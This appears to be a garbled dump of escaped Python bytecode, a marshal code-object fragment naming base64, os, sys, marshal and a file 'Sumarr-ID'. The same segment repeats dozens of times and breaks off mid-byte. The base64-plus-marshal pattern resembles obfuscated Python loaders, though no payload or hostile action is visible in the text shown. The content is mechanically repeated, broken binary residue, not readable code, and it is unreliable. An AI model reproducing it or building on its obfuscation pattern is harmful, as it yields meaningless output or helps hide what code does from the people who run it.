s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00
asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00
\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x
01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00
\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marsh
alR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\
x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00
(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00
t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr
-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\
x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\